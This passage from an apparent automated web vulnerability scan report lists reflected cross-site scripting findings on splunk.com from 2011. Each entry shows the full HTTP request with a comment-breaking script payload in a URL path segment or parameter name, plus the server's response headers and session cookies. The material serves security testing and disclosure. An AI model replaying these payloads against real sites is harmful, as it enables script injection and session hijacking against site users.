This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /themes2498f--><script>alert(1)</script>de17f1d4431/splunk_com/css/slimbox/slimbox2.css HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=173.193.214.243.1296942538894423; XARAYASID=1mtgfd73mkm07svvqv720eu567
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:12:36 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:42:36 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:42:36 GMT; path=/ ETag: e39aa070e2c2e39ff56fe5017ae0ae9d1296943957-gzip Last-Modified: Sat, 05 Feb 2011 22:12:37 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18574
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload fc34e--><script>alert(1)</script>94770923e9a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /themes/splunk_comfc34e--><script>alert(1)</script>94770923e9a/css/slimbox/slimbox2.css HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=173.193.214.243.1296942538894423; XARAYASID=1mtgfd73mkm07svvqv720eu567
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:12:58 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:42:58 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:42:58 GMT; path=/ ETag: 75f170d65684a73c9175de775ee543ea1296943979-gzip Last-Modified: Sat, 05 Feb 2011 22:12:59 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18574
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload a38cb--><script>alert(1)</script>1dcff4e2ee6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /themes/splunk_com/cssa38cb--><script>alert(1)</script>1dcff4e2ee6/slimbox/slimbox2.css HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=173.193.214.243.1296942538894423; XARAYASID=1mtgfd73mkm07svvqv720eu567
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:13:22 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:43:23 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:43:23 GMT; path=/ ETag: 894d6171143dc17f5720f7556280e9a21296944003-gzip Last-Modified: Sat, 05 Feb 2011 22:13:23 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18574
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into an HTML comment. The payload e7954--><script>alert(1)</script>d8a7d5b7df7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /themes/splunk_com/css/slimboxe7954--><script>alert(1)</script>d8a7d5b7df7/slimbox2.css HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=173.193.214.243.1296942538894423; XARAYASID=1mtgfd73mkm07svvqv720eu567
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:13:49 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:43:50 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:43:50 GMT; path=/ ETag: fbe93a3e06253d5077954e9d02f4b3361296944030-gzip Last-Modified: Sat, 05 Feb 2011 22:13:50 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18574
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 5 is copied into an HTML comment. The payload 8158b--><script>alert(1)</script>9e902cde54a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /themes/splunk_com/css/slimbox/slimbox2.css8158b--><script>alert(1)</script>9e902cde54a HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=173.193.214.243.1296942538894423; XARAYASID=1mtgfd73mkm07svvqv720eu567
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:14:16 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:44:16 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:44:16 GMT; path=/ ETag: cef50f9668823485c56e5c1c90b96dd71296944056-gzip Last-Modified: Sat, 05 Feb 2011 22:14:16 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18574
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload af711--><script>alert(1)</script>a24d2298d97 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /themesaf711--><script>alert(1)</script>a24d2298d97/splunk_com/css/v5.php?v=09-28-10 HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=173.193.214.243.1296942538894423; XARAYASID=1mtgfd73mkm07svvqv720eu567
The value of REST URL parameter 2 is copied into an HTML comment. The payload 98594--><script>alert(1)</script>26db2ff63a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /themes/splunk_com98594--><script>alert(1)</script>26db2ff63a4/css/v5.php?v=09-28-10 HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=173.193.214.243.1296942538894423; XARAYASID=1mtgfd73mkm07svvqv720eu567
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 21:50:09 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:20:09 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:20:09 GMT; path=/ ETag: cb920ddb93bb4103279686dda03417c01296942609-gzip Last-Modified: Sat, 05 Feb 2011 21:50:09 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18553
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload f740a--><script>alert(1)</script>422a105e703 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /themes/splunk_com/cssf740a--><script>alert(1)</script>422a105e703/v5.php?v=09-28-10 HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=173.193.214.243.1296942538894423; XARAYASID=1mtgfd73mkm07svvqv720eu567
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 21:50:27 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:20:27 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:20:27 GMT; path=/ ETag: 1428f39b62214888b5438b42d1dc9b321296942628-gzip Last-Modified: Sat, 05 Feb 2011 21:50:28 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18553
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 4 is copied into an HTML comment. The payload 6fa8d--><script>alert(1)</script>2c0892ab672 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /themes/splunk_com/css/v5.php6fa8d--><script>alert(1)</script>2c0892ab672?v=09-28-10 HTTP/1.1 Host: www.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/download?ac=Adwords_Unix&_kk=unix%20server&_kt=c6320b89-e2a5-4dbf-a9d0-dd556bdb1c51&gclid=CPeW6bn_8aYCFcfe4Aod22SxHw Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=173.193.214.243.1296942538894423; XARAYASID=1mtgfd73mkm07svvqv720eu567
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 21:50:47 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:20:47 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:20:47 GMT; path=/ ETag: 30b81ce7ac45eb518aff5f0affe49be11296942647-gzip Last-Modified: Sat, 05 Feb 2011 21:50:47 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18553
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 76c3a--><script>alert(1)</script>8f12478cdc7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videos76c3a--><script>alert(1)</script>8f12478cdc7 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.495. http://www.splunk.com/videos [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/videos
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8c760--><script>alert(1)</script>7d5cbb3f69a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videos?8c760--><script>alert(1)</script>7d5cbb3f69a=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:20:39 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 76902
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the r request parameter is copied into an HTML comment. The payload a012a--><script>alert(1)</script>bdc5183cb13 was submitted in the r parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videos?r=modala012a--><script>alert(1)</script>bdc5183cb13 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:20:49 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 76917
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload c4614--><script>alert(1)</script>d9aa5331c73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /viewc4614--><script>alert(1)</script>d9aa5331c73/ HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
4.498. http://www.splunk.com/view/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.splunk.com
Path:
/view/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload b181b--><script>alert(1)</script>81c722c99ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/?b181b--><script>alert(1)</script>81c722c99ff=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:18:55 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:48:55 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:48:55 GMT; path=/ ETag: 57bbe3de95c4ad027902e4a9cb6c0e0f1296944335 Last-Modified: Sat, 05 Feb 2011 22:18:55 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18248
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload b0e48--><script>alert(1)</script>ca595a7ca02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
